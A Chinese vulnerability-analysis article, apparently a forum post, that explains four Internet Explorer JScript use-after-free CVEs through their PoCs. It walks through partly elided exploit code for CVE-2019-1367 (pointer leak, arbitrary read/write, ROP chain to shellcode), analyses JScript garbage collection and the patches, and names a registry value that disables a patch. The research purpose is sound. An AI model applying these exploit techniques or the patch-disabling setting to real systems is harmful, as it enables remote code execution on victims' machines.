Jscript组件是一个已被微软弃用的JavaScript引擎,主要在IE8以及更早的版本中使用。从IE9开始,微软用Jscript9替代了Jscript,但依然保持对Jscript的解析接口。一种比较常见的“召唤”方式如下:
<meta http-equiv="X-UA-Compatible" content="IE=8"></meta> <script language="Jscript.Encode"> // ... Jscript Code ... </script>
2017年12月,Google Project Zero的Ivan Fratric等人公开了一种新的Windows平台攻击方式。该方式借助Jscript漏洞和WPAD/PAC协议,实现了在Win10上通过单个Jscript漏洞实现远程代码执行和沙箱逃逸。这种方式显然引起了攻击者的注意,2018年12月,谷歌捕获了第1个利用该方式进行实际攻击的漏洞,在随后的1年时间内,又连续出现3个相同类型的漏洞,一时间让原本已经无人问津的Jscript组件又重新引起大家的注意。
在本小节中,笔者将结合每个漏洞的PoC简要介绍4个Jscript漏洞,通过PoC比对,读者将感受到这些漏洞的相似之处。
首先跟随笔者看一下CVE-2018-8653的PoC,如下:
var objs = new Array(); var refs = new Array(); var dummyObj = new Object(); function uaf() { // this未被GC追踪 for (var i = 0; i < 10000; i++) { objs[i] = null; } CollectGarbage(); for (var i = 0; i < 201; i++) { refs[i].prototype = null; } CollectGarbage(); alert(this); // <- 触发crash return true; } for (var i = 0; i < 201; i++) { var arr = new Array({ prototype: {} }); var e = new Enumerator(arr); refs[i] = e.item(); } for (var i = 0; i < 201; i++) { refs[i].prototype = new RegExp(); refs[i].prototype.isPrototypeOf = uaf; } for ( var i = 0; i < 10000; i++ ) { objs[i] = new Object(); } dummyObj instanceof refs[200];
这个漏洞一个由instanceof回调导致的UAF漏洞,Jscript代码没有将自定义的instanceof回调函数(即PoC中的uaf)的this参数加入GC追踪列表,导致在回调函数中可以强制触发垃圾回收机制,得到悬垂指针,后面再次访问该指针时即发生UAF。
接着是CVE-2019-1367的PoC,如下:
var spray = new Array(); function uaf() { // arguments未被GC追踪 for(var i = 0; i < 20000; i++) { spray[i] = new Object(); } arguments[0] = spray[5000]; for(var i = 0; i < 20000; i++) { spray[i] = 0; } CollectGarbage(); alert(arguments[0]); // <- 触发crash return 0; } [0, 0].sort(uaf);
这个漏洞是一个由Array.sort函数导致的UAF漏洞,Jscript代码没有将sort函数中的arguments属性加入GC追踪列表,导致在回调函数中可以强制触发垃圾回收机制,得到悬垂指针,后面再次访问该指针时即发生UAF。
第3个漏洞是CVE-2019-1429,这个漏洞对应的PoC如下:
var spray = new Array(); function uaf() { // arguments未被GC追踪 for (var i = 0; i < 20000; i++) { spray[i] = new Object(); } arguments[0] = spray[5000]; for (var i = 0; i < 20000; i++) { spray[i] = 1; } CollectGarbage(); alert(arguments[0]); // <- 触发crash } var o = {toJSON:uaf} JSON.stringify(o);
这个漏洞是一个由toJSON函数导致的UAF漏洞,Jscript代码没有将toJSON函数中的arguments属性加入GC追踪列表,导致在回调函数中可以强制触发垃圾回收机制,得到悬垂指针,后面再次访问该指针时即发生UAF。
细心的读者肯定已经发现了,这和CVE-2019-1367不就是同一个漏洞吗?是的,它们就是同一个漏洞,但是微软就是没有补好。
最后一个漏洞是CVE-2020-0674,我们来看一下这个漏洞的PoC:
var depth = 0; var spray_size = 10000; var spray = new Array(); var sort = new Array(); var total = new Array(); for(i = 0; i < 110; i++) sort[i] = [0, 0]; for(i = 0; i < spray_size; i++) spray[i] = new Object(); function uaf(arg1, arg2) { // arg1, arg2等传入的参数未被GC追踪 arg1 = spray[depth * 2]; arg2 = spray[depth * 2 + 1]; if(depth > 50) { spray = new Array(); CollectGarbage(); total.push(arg1); total.push(arg2); return 0; } depth += 1; sort[depth].sort(uaf); return 0; } sort[depth].sort(uaf); for(i = 0; i < total.length; i++) { typeof total[i]; // <- 触发crash }
这个漏洞和CVE-2019-1367又非常像,又一个由Array.sort函数导致的UAF漏洞,所不同的是这次的问题不是出在arguments属性,而是出在传入的参数中。Jscript代码没有将sort函数中的调用参数加入GC追踪列表,导致在回调函数中可以强制触发垃圾回收机制,得到悬垂指针,后面再次访问该指针时即发生UAF。
相信许多读者和笔者一样,看上面几个案例后,会下意识地找一下通过Json序列化操作触发CVE-2020-0674的路径,并构造出第5个PoC:
var depth = 0; var spray_size = 10000; var spray = new Array(); var arr = new Array(); var total = new Array(); for(i = 0; i < 110; i++) arr[i] = [0, 0]; for(i = 0; i < spray_size; i++) spray[i] = new Object(); function uaf(arg1, arg2) { // arg1, arg2等传入的参数未被GC追踪 arg1 = spray[depth * 2]; arg2 = spray[depth * 2 + 1]; if(depth > 50) { spray = new Array(); CollectGarbage(); total.push(arg1); total.push(arg2); return 0; } depth += 1; JSON.stringify(arr[depth], uaf); return 0; } JSON.stringify(arr[depth], uaf); for(i = 0; i < total.length; i++) { typeof total[i]; // <- 触发crash }
事实上,这个PoC确实可以导致Crash,是CVE-2020-0674的兄弟漏洞,但是在CVE-2020-0674的补丁出来后,此类UAF已经无法触发。
读者看完上述5个PoC后,是不是感觉微软在修补此类漏洞时显得很不专业?微软应该在一开始就将此类漏洞从根本上修复,这样就不会有这么多补丁绕过漏洞。事实上,Ivan Fratric在上述几个漏洞出现之前就发出过相关警告,并且在漏洞出现后也发表过感慨,喜欢考古的读者可以看一下文末参考链接“补丁分析”部分的两个推特链接。
在本小节中,笔者将分享CVE-2019-1367利用代码的一些细节,之所以选择CVE-2019-1367,一方面是因为国外已经有研究员写过相关分析,但文章过长,且文内代码经过混淆,不易阅读,笔者结合手上资料对相关代码进行了解混淆,以便于阅读;另一方面是因为4个漏洞的利用代码大同小异,举一例即可。
以下只分析32位下的利用代码,为保持一致,代码中出现的注释复用国外分析文章中的注释。随笔者一起来看一下如何只用单个UAF漏洞即实现远程代码执行。
首先回顾下32位下variant在内存中的数据结构:
// total size 0x10 bytes struct VAR { QWORD type; // 8 bytes void* obj_ptr; // 4 bytes VAR next_var; // 4 bytes }
利用代码首先在内存中布局一定数量的RegExp对象(作为参数的reSrc大有玄机,后面会再次提及):
var refsLimit = 2 * 100 - 1; for(var i = 0; i < refsLimit; i++) rrefs[i] = new RegExp(reSrc); // <--- spray with pattern text "reSrc"
随后借助UAF漏洞,用经典的Jscript UAF占位手法(详情可参考笔者对CVE-2018-8353的分析文章),将一个原本表示RegExp对象的variant的type域从0x81(对象)修改为0x03(number),从而将一个RegExp对象指针以整数形式泄露出来:
function makeVariant(vt, dword1, dword2){ var charCodes = new Array(); charCodes.push(vt, 0x00, 0x00, 0x00, dword1 & 0xFFFF, (dword1 >> 16) & 0xFFFF, dword2 & 0xFFFF, (dword2 >> 16) & 0xFFFF); return String.fromCharCode.apply(null , charCodes); } var reallocPropertyName = "\u0000\u0000"; while(reallocPropertyName.length < 0x17a) reallocPropertyName += makeVariant(0x0082); reallocPropertyName += "\u0003"; // ... code skipped ... dummyArrs[0].sort(FreeingComparator); var srcs = new Array(); for(var i = 0; i < refsLimit; i++) try{ throw erefs[i]; }catch(e){ srcs[i] = e.source; } var leakIndex = -1; for(var i = 0; i < refsLimit; i++) try{ if((typeof nrefs[i]) === "number"){ leakIndex = i; break; } }catch(e){} if(leakIndex == -1) throw new Error("Could not find RegExp address."); else{}
得到RegExp对象指针后,借助makeVariant函数将RegExpObj+4的地方封装为一个字符串variant(type=0x82)的指针部分,并再次借助漏洞将其布局到内存:
var leakRegExpObj = nrefs[leakIndex] & 0xFFFFFFFF; var extendPropertyName = "\uFFFF\uFFFF\uFFFF\uFFFF\uFFFF\uFFFF" + makeVariant(0x0082, leakRegExpObj + 4); // string 4 bytes ahead, leakRegExpObj is previous fake VAR of type number (0x3) for(var i = refsLimit; i >= leakIndex; i--) nrefs[i] = null; for(var i = 0; i < 0x1000; i++) propHolders[i][extendPropertyName] = 1; // store the property name while(--leakIndex >= 0) try{ if((typeof nrefs[leakIndex]) === "string" && nrefs[leakIndex].length > 0x1000) break; else nrefs[leakIndex] = null; } catch(e){} if(leakIndex == -1) throw new Error("Could not find RegExp leak string."); else{}
搜索到对应的字符串variant后,此时的variant.obj_ptr指向一个伪造的BSTR对象的字符串部分,这个BSTR对象的length部分为RegExpObj的虚表,是一个非常大的值;str部分为RegExpObj+0x04。到这里已经具备了越界读取能力,随后借助这一越界读取能力读取整个RegExpObj的内容并保存到fakeRegExpCharCodes数组,并在数组的最后为shellcode预留了位置(0xCCCC):
var bstrVal = 8; var sizeof_RegExpObj = 0xC0; var m_pvarMaster = 0x10; var m_varCode = 0x38; var m_varSrc = 0x48; // ... code skipped ... // here nrefs[leakIndex].length value is faulty and points to a large number // nrefs[leakIndex].charCodeAt(i) can be used to read arbitrary bytes. var fakeRegExpCharCodes = new Array(); fakeRegExpCharCodes.push((nrefs[leakIndex].length * 2) & 0xFFFF); fakeRegExpCharCodes.push(((nrefs[leakIndex].length * 2) >> 16) & 0xFFFF); for(var i = 0; i < sizeof_RegExpObj / sizeof_WCHAR; i++) fakeRegExpCharCodes.push(nrefs[leakIndex].charCodeAt(i)); fakeRegExpCharCodes[m_pvarMaster / sizeof_WCHAR] = 0; fakeRegExpCharCodes[(m_pvarMaster / sizeof_WCHAR) + 1] = 0; for(var i = 0; i < sizeof_VAR / sizeof_WCHAR; i++){ fakeRegExpCharCodes[m_varCode / sizeof_WCHAR + i] = fakeRegExpCharCodes[m_varSrc / sizeof_WCHAR + i]; fakeRegExpCharCodes[m_varSrc / sizeof_WCHAR + i] = 0; } for(var i = 0; i < shellcode.length; i++) fakeRegExpCharCodes.push(0xCCCC); var fakeRegExpStr = String.fromCharCode.apply(null, fakeRegExpCharCodes);
前面已经从内存中“dump”出一个完整的RegExpObj(一共dump了sizeof_RegExpObj+4字节),接下来是整个利用过程的精彩部分,跟随笔者一起来看一下利用代码如何借助正则表达式对象构造一个完美的任意地址写入原语。
要理解这一过程,首先需要了解下RegExpObj的一些成员,RegExpObj在32位下的大小为0xC0,其中比较重要的几个成员如下:
如上面代码所示,利用借助fakeRegExpCharCodes数组修改了上述RegExpObj+0x10和RegExpObj+0x38处的变量,首先将RegExpObj+0x10开始的4字节置为空,然后将RegExpObj+0x48处的0x10字节拷贝到RegExpObj+0x38处,即替换了对应的variant。为什么要这么做?这就涉及到本小节最前面的那句new RegExp(reSrc)。原来,攻击者传给RegExp的reSrc参数是一个精心设计的RegExpExec,经过上面的替换后RegExpObj+0x38处的RegExpExec已经变成一个伪造的RegExpExec,后面正是借助这个伪造的RegExpExec实现任意地址写。
修改完fakeRegExpCharCodes后,将其转化为一个fakeRegExpStr字符串对象,然后循环调用RegExp.compile方法将其更新到内存,并调用RegExp.source将fakeRegExpStr的地址更新到RegExpObj+0x48处的variant.obj_ptr,随后读取RegExpObj+0x48处的内存,得到fakeRegExpStr的地址。
得到fakeRegExpStr的地址后,再次借助makeVariant将其封装为一个type=0x81的variant,并第3次触发漏洞将variant布局到被释放的内存。随后在内存定位到对应的variant,得到一个RegExpObj,取出RegExpObj+0x48处的variant。如前所述,这个variant是type=0x80,是一个间接引用,需要读取variant.obj_ptr作为新的variant,再读取一次variant.obj_ptr
// obj_ptr points to the VAR.obj_ptr corresponding to the VAR in RegExpObj+0x48 var obj_ptr = (nrefs[leakIndex].charCodeAt(((m_varSrc - 4 + bstrVal) / sizeof_WCHAR) + 1) << 16) | (nrefs[leakIndex].charCodeAt((m_varSrc - 4 + bstrVal) / sizeof_WCHAR) + 2); // 注意这边这个+2很有意思 // The memory at obj_ptr is read, by creating fake VARs pointing to the addres in obj_ptr (VAR.obj_ptr) var extendPropertyName2 = "\uFFFF\uFFFF\uFFFF\uFFFF\uFFFF\uFFFF" + makeVariant(0x0082, obj_ptr); for(var i = refsLimit; i >= leakIndex; i--) nrefs[i] = null; for(var i = 0; i < 0x1000; i++) propHolders[i][extendPropertyName2] = 1; while(--leakIndex >= 0) try{ if((typeof nrefs[leakIndex]) === "string" && nrefs[leakIndex].length > 0x1000) // m_varSrc处是一个type=0x80的variant指针,解引用后是一个type=8的字符串VAR break; else nrefs[leakIndex] = null; }catch(e){} if(leakIndex == -1) throw new Error("Could not find GcBlock leak string."); else{} var fakeRegExpAddr = -1; /* Reading the content of this VAR.Obj_ptr, this VAR corresponding to a String VAR. 0:000> dc 076cf6f8-10 076cf6e8 076c0008 054ebd08 061ebcec 6c011380 ..l...N........l 076cf6f8 00000008 00000000 [061ebb24] 076cf728 ........$...(.l. <- 内存对齐时的variant 076cf708 00000008 00000000 061e8114 076cf6a8 ..............l. 076cf718 00000008 00000000 061eb95c 40300000 ........\.....0@ 076cf728 02bb0081 00000002 0770c9f0 076cf748 ..........p.H.l. 076cf738 00000009 00000000 0770a158 00000000 ........X.p..... 076cf748 076c0008 054ebd08 061eb794 6c011380 ..l...N........l 076cf758 00000008 00000000 061eb5cc 076cf788 ..............l. 0:000> dc 076cf6f8+2-4 076cf6f6 00086c01 00000000 [bb24]0000 f728[061e] .l........$...(. <- 借助前面的数据伪造length后的内存,所以为 charCodeAt(4) << 16) | charCodeAt(3),长度被解释为,0x86c01,符合校验条件 076cf706 0008076c 00000000 81140000 f6a8061e l............... 076cf716 0008076c 00000000 b95c0000 0000061e l.........\..... 076cf726 00814030 000202bb c9f00000 f7480770 [email protected]. 076cf736 0009076c 00000000 a1580000 00000770 l.........X.p... 076cf746 00080000 bd08076c b794054e 1380061e ....l...N....... 076cf756 00086c01 00000000 b5cc0000 f788061e .l.............. 076cf766 0008076c 00000000 7d6c0000 f708061e l.........l}.... // fake RegExpObj 0:000> dc 061ebb24 061ebb24 6bfe2b3c 00000001 078b7af0 02bc3588 <+.k.....z...5.. 061ebb34 00000000 ffffffff 076caf40 00080000 [email protected]..... 061ebb44 00000000 6bfe78a8 02bbe920 0770c93c .....x.k ...<.p. 061ebb54 0770caf4 6c071bb8 00000080 00000000 ..p....l........ 061ebb64 076cc338 00000000 00000000 00000000 8.l............. 061ebb74 00000000 00000000 00000000 00000000 ................ 061ebb84 00000000 00000000 00000000 00000000 ................ 061ebb94 00000000 00000000 00000000 00000000 ................ 0:000> ln 6bfe2b3c (6bfe2b3c) jscript!RegExpObj::`vftable' | (6bfe2c38) jscript!NameList::`vftable' Exact matches: */ if(nrefs[leakIndex].charCodeAt) fakeRegExpAddr = (nrefs[leakIndex].charCodeAt(4) << 16) | nrefs[leakIndex].charCodeAt(3); // 读取fakeRegExp字符串首地址 if(fakeRegExpAddr == -1) throw new Error("Failed to leak fake RegExp address.");
获得fakeRegExpAddr后,再次借助makeVariant,将fakeRegExpAddr封装到一个type=0x81的variant,随后第4次借助漏洞进行布局,在内存中搜索得到伪造的RegExp对象,到这里就获得了一个精心伪造的RegExp对象,借助RegExp.test()函数测试是否伪造正确:
var extendPropertyName3 = "\uFFFF\uFFFF\uFFFF\uFFFF\uFFFF\uFFFF" + makeVariant(0x0081, fakeRegExpAddr); // regexp type for(var i = refsLimit; i >= leakIndex; i--) nrefs[i] = null; for(var i = 0; i < 0x1000; i++) propHolders[i][extendPropertyName3] = 1; while(--leakIndex >= 0) try{ if((typeof nrefs[leakIndex]) === "object") break; else nrefs[leakIndex] = null; }catch(e){} if(leakIndex == -1) throw new Error("Could not find fake RegExp."); else{} var fakeRegExp = nrefs[leakIndex]; var reTestResult = fakeRegExp.test("t"); // RegExp.test() if(!reTestResult) throw new Error("Fake RegExp did not respond correctly to test execution, creation may have failed.");
借助上述伪造的RegExp对象就可以实现任意地址写:
function write(where, what) { try { var byteCodeStack = String.fromCharCode.apply(null, [0x0077, 0x0110, 0x0000, 0x0000, 0x0000, ((what & 0xFF) << 8) | 0x03, (what & 0xFFFF00) >> 8, ((where & 0xFF) << 8) | (((what & 0xFF000000) >> 24) & 0xFF), (where & 0xFFFF00) >> 8, (0x07 << 8) | (((where & 0xFF000000) >> 24) & 0xFF)]); fakeRegExp.test(byteCodeStack); } catch(e) {} return byteCodeStack; }
这个write函数是整个利用中最精彩的部分,这个原语的构造细节涉及到Jscript正则引擎的虚拟机知识,利用的编写者肯定对Jscript模块的正则表达引擎非常熟悉。由于笔者并不擅长这块,这部分等待有能力的读者进行补充分析。
有了任意地址写原语后,配合RegExpObj+0x48处的variant,就可以通过修改type和obj_ptr的方式实现任意地址读取,由于BSTR对象的length在读取时会除以2,所以具体的读取函数会借助移位来避免数据失真。
function readBYTE(where){ write(fakeRegExpAddr + m_varSrc, 0x82); write(fakeRegExpAddr + m_varSrc + bstrVal, where + sizeof_DWORD - 1); return (fakeRegExp.source.length >> 7) & 0xFF; } function readWORD(where){ return ((readBYTE(where + 1) << 8) | readBYTE(where)); } function readDWORD(where){ return ((readBYTE(where + 3) << 24) | (readBYTE(where + 2) << 16) | (readBYTE(where + 1) << 8) | readBYTE(where)); }
构造出任意地址读写原语后,利用代码首先借助这两个原语封装了一系列功能函数,然后借助write函数的返回值泄露了 一个native栈上的地址,并在该基础上得到一个栈上的返回地址,用搜索得到的ROP gadget覆盖之,在函数返回时,控制流被劫持,绕过CFG并运行shellcode:
write(newEbp + 4, popEcxRet + 1); // rop gadget: ret write(newEbp + 4 + 4 + 0x18, popEcxRet); // rop gadget: pop eax; ret write(newEbp + 4 + 4 + 0x1C, popEcxRet + 1); // rop gadget: ret write(newEbp + 4 + 4 + 0x20, popEbpRet); // virtual Protect Address write(newEbp + 4 + 4 + 4 + 0x20, fakeRegExpAddr + sizeof_RegExpObj); // virtual protect return address (shellcode address) write(newEbp + 4 + 4 + 4 + 4 + 0x20, fakeRegExpAddr + sizeof_RegExpObj); // lpAddress (shellcode address) write(newEbp + 4 + 4 + 4 + 4 + 4 + 0x20, (shellcode.length * sizeof_WCHAR)); // dwSize (shellcode size) write(newEbp + 4 + 4 + 4 + 4 + 4 + 4 + 0x20, 0x40); // PAGE_EXECUTE_READWRITE write(newEbp + 4 + 4 + 4 + 4 + 4 + 4 + 4 + 0x20, newEbp - 0x1000); // oldprotect write(regExpExecAddress, newEbp); // <-- overwrites return address in the native stack
关于该利用的更多细节可以参考这篇文章:
https://blog.confiant.com/internet-explorer-cve-2019-1367-exploitation-part-2-8143242b5780
在本小节中,笔者来讨论下这类漏洞形成的具体原因,读者首先需要了解下垃圾回收算法里面的标记-清除算法(Mark Sweep GC)。这个算法在《垃圾回收的算法与实现》一书的算法篇第2章中有清晰的描述,几个关键概念如下:
上述这类Jscript漏洞的根源在于:在进入特定的回调函数/调用函数的过程中,开发者忘记将个别对象属性或者栈上的variant变量加入相应的Root/Scavenge(回收)列表进行追踪。导致在回调函数中可以获得对问题variant的引用,手动调用CollectGarbage触发GC,使variant被回收,最终获得悬垂指针,造成UAF。
Jscript的开发工程师曾经写过一篇关于Jscript垃圾回收机制的设计性描述,有兴趣的读者可以参考:
https://docs.microsoft.com/zh-cn/archive/blogs/ericlippert/how-do-the-script-garbage-collectors-work
关于Jscript中GC机制的具体实现,国外研究员Sudhakar Verma写过一篇很棒的分析,为方便读者理解,笔者在这里对其进行注释说明,读者也可以在文末参考链接“Jscript的垃圾回收机制”一节中找到这篇文章并阅读。
Jscript中的variant存在一个个GCBlock结构中,每个GCBlock结构如下:
struct GcBlock{ struct GcBlock * prev; struct GcBlock * next; VARIANT mem[100]; };
当定义变量时,Jscript引擎内部会申请一些GCBlock,并初始化其内部的variant结构。
申请第一个GCBlock的相关调用如下:
GcBlockFactory::GcBlockFactory GcContext::EnsureGc GcContext::New GcContext::GcContext GcContext::Init
当有需要时,更多GCBlock被申请,申请过程如下:
GcAlloc::PvarAlloc GcBlockFactory::PblkAlloc // Jscript中有一个全局变量,这个变量是一个大小为50的GCBlock缓存链表的头部,当申请一个GCBlock时,优先从该链表申请 GcBlock::Link
申请到的每一个GCBlock都会链接到一个双向链表(区别于缓存链表的另一个链表),遍历链表可以访问到所有GCBlock中的所有variant。
当在Jscript代码中手动调用CollectGarbge函数时,Jscript引擎会调用JsCollectGarbage函数,JsCollectGarbage进一步会调用GcContext::Collect函数,紧随Mark、Scavenge、和Sweep三个过程。
Mark阶段会遍历GCBlock链表,并遍历每个GCBlock中的所有variant,对所有variant的第12位(定义第1位为最低位)置位1(|= 0x800),这个过程涉及的调用如下:
GcContext::SetMark GcAlloc::SetMark
Mark完毕后是Scavenge阶段,这个阶段的任务是捡拾,即把所有还在使用中的对象从Mark阶段“抢救”回来,方法是从每一种不同的Root开始遍历,得到所有可遍历到的Jscript对象和variant,并将所有遍历到的variant的第12位置为0(&=0xf7ff),相关函数的调用顺序如下:
ObjectRegistration::ScavengeRoots FncObj::ScavengeCore GcContext::ScavengeVar VarStack::ScavengeRoots ObjectRegistration::ScavengeRoots ScrFncObj::ScavengeCore ObjectRegistration::ScavengeRoots VAR::Scavenge GcContext::ScavengeVar NameTbl::ScavengeCore NameList::ScavengeRoots ScavVarList::ScavengeRoots GcContext::ScavengeVar GCRootStack::ScavengeRoots
最后是清理阶段,这个阶段会再次遍历GCBlock链表,并遍历每个GCBlock中的所有variant,对所有第12位为1的variant进行对应的清理。当一个GCBlock内的所有variant都被清理时,这个GCBlock并不会被立即释放,只会对一个全局计数加1,并将这个GCBlock加入上述缓存链表。当全局计数大于等于50时,Jscript会将多余的GCBlock摘链后直接进行delete。相关过程如下所示:
GcContext::Reclaim(0x4f96030, 0x2) GcAlloc::ReclaimGarbage(0x4f9c580) // 作者举了一个64位下的例子进行说明,此时variant的第12位为1(0x808) 00000000`04f9ce20 00000000`00000808 00000000`01ab9ff8 00000000`04f9ce30 00000000`00000000 VariantClear(0x4f9ce20) // 到这里Flag已经被清除,即将清理相应的variant 00000000`04f9ce20 00000000`00000008 00000000`01ab9ff8 00000000`04f9ce30 00000000`00000000 VariantClear+6b returns 0x0 GcContext::Adapt(0x4f96030, 0x1, 0x11) GcContext::Adapt+77 returns 0x6 GcAlloc::ReclaimGarbage+24a returns 0x6 GcContext::NormalizeBuckets(0x4f96030) GcContext::NormalizeBuckets+4c returns 0x24b978 GcContext::Reclaim+128 returns 0x1 GcContext::CollectCore+1bb returns 0x1 GcContext::Collect+43 returns 0x1 JsCollectGarbage+29 returns 0x0
现在,读者应该可以比较清晰地了解Jscript中的垃圾回收机制。
提及微软对此类漏洞的修复,比较早的一个修复方案要追溯到CVE-2018-8353,这个漏洞是Ivan Fratric发现的,成因和本文中讨论的几个漏洞完全一致,微软当时的修复方案是将造成lastIndex加入Scavenge(捡拾)列表,大致如下:
VAR::Scavenge(RegExpObj.lastIndex, GcContextObj)
很明显,这是一种创可贴式的修补,它解决了当前问题,但没有解决此类问题。随后的CVE-2018-8653,CVE-2019-1367,CVE-2019-1429都是创可贴式的修补,直到CVE-2020-0674的修补方案出现。在CVE-2020-0674的补丁中,微软在Jscript中加入了一个新的函数ScrFncObj::PerformCall,之前对CallWithFrameOnStack和CallWithFrameOnHeap的调用都改为间接调用ScrFncObj::PerformCall进入,在ScrFncObj::PerformCall中,会将函数参数都加入到root列表中,这样就从根本上杜绝了CVE-2020-0674这类漏洞的产生。笔者在进行补丁分析的过程中,查到启明星辰的一篇文章,这篇文章对CVE-2020-0674补丁进行了比较细致的分析,文末参考链接“补丁分析”处给出了文章的网址,读者可以进行参考。
有意思的是,在CVE-2019-1367的补丁中,微软在Jscript引入了一个GcContext::IsLegacyGCEnabled()函数。如伪码所示,这个函数用来检查是否开启旧的GC机制,方法是检查HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Policies项下一个REG_DWORD类型的键:ee1ca8aa-4402-4da1-bbe2-69a09c483a56的值是否为1,若为1,则不对导致漏洞的对象进行GC追踪。
int __stdcall GcContext::InitIsLegacyGCEnabled(union _RTL_RUN_ONCE *a1, void *a2, void **a3) { DWORD cbData; HKEY phkResult; DWORD Type; BYTE Data[4]; *(_DWORD *)Data = 0; cbData = 4; Type = 0; GcContext::s_fIsLegacyGCEnabled = 0; if ( !RegOpenKeyExA(HKEY_LOCAL_MACHINE, "System\\CurrentControlSet\\Policies", 0, 0x20119u, &phkResult) ) { if ( !RegQueryValueExA(phkResult, "6310d37c-a685-4133-81b7-01b42749b9b4", 0, &Type, Data, &cbData) && *(_DWORD *)Data == 1 && Type == REG_DWORD ) { GcContext::s_fIsLegacyGCEnabled = 1; } RegCloseKey(phkResult); } return 1; }
笔者在打了CVE-2020-0674补丁的机器上新建了上述注册表项和键,并设为1,发现CVE-2020-0674的补丁不再起作用,由此推测该注册表可能是为了兼容性问题所设。
本文中笔者回顾了近两年出现的4个jscript零日漏洞,借助PoC解释了这些漏洞的成因,分析了其中一个漏洞的在野利用方式,并对相关修补方案做了简要分析。随着CVE-2020-0674的补丁方案的引入,此类Jscript UAF基本宣告落幕。这几个案例清楚地告诉我们:对漏洞修复工作者来说,如果对一类通用漏洞中的某个Case采用创可贴式的修复,不深挖根源,就会导致本文中这样连续绕过的故事,最后于时间和精力上都是巨大的开销。
《0day安全 软件漏洞分析技术(第二版)》第三次再版印刷预售开始!
最后于 4小时前 被银雁冰编辑 ,原因: